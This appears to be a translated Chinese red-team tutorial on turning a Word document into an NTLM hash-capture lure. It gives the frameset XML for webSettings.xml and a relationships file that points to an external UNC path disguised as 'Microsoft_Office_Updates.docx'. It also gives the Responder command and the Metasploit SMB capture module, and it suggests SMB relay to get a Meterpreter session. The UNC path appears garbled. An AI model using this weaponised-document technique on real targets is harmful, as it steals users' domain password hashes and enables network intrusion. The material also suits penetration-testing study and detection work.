微软Office文档文件对于红队评估起着至关重要的作用，因为他们通常习惯于在客户的内部网络上获得一些初步的立足点。保持在雷达之下也是一个关键的因素，这只能通过滥用合法的Windows功能或可靠的应用程序（如Microsoft Office）来实现。

在历史上，Microsoft Word被用作HTML编辑器。这意味着它可以支持HTML元素，如框架集。因此，可以将Microsoft Word文档与UNC路径相链接，并将其与Responder结合，就能从外部捕获NTLM哈希值。0

带有docx扩展名的Word文档实际上是一个包含各种XML文档的zip文件。这些XML文件主要用于控制主题，字体，文档的设置和Web设置。使用7-zip 可以打开该压缩包看看这些文件：

Docx 文件内容

word文件夹中包含一个名为webSettings.xml的文件。这个文件需要修改才能包含框架集。

webSettings文件

添加下面的代码将创建与另一个文件的链接。

<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
<w:color w:val="auto"/>
<w:noBorder/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="3"/>
<w:sourceFileName r:id="rId1"/>
<w:linkedToFile/>
</w:frame>
</w:frameset>
</w:frameset>

webSettings XML – 框架集

包含框架集的新的webSettings.xml文件需要重新添加到存档中，覆盖以前的版本。

带有Frameset的webSettings – 添加新版本到压缩包

必须创建一个新文件（webSettings.xml.rels），并包含关系ID (rId1)，UNC路径和TargetMode（是否是外部或内部的）。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>

web设置XML关系文件 的内容

_rels文件夹包含了文档的字体，风格，主题，设置等。将新的文件放置在该目录将最终确定和之前已经通过框架集创建的文件之间的关系链接。

webSettings XML rels 文件夹

现在，Word文档已被武装化并在打开时连接到网络上的UNC路径，Responder可以被配置为捕获NTLM哈希值。

responder -I wlan0 -e 192.168.1.169 -b -A -v

Responder配置

一旦目标用户打开Word文档，它将尝试连接到UNC路径。

打开Word文档会通过框架集连接到UNC路径

Responder将检索用户的NTLMv2哈希值。

Responder 可以获取到通过框架集的NTLMv2哈希

或者可以使用Metasploit Framework来代替Responder来捕获密码哈希值。

auxiliary/server/capture/smb

Metasploit – SMB捕获模块

打开文档后，Metasploit将捕获NTLMv2哈希值。

Metasploit SMB捕获模块 – 通过框架集的NTLMv2哈希

结论

如果VPN访问的双因素身份验证未启用且密码策略较弱，则该技术可以允许红队从用户那里获取可用于内部网络访问的域密码哈希值。此外，如果目标用户是本地管理员或域管理员等高权限帐户，则可以将此方法与SMB中继组合利用，就可以获得Meterpreter会话。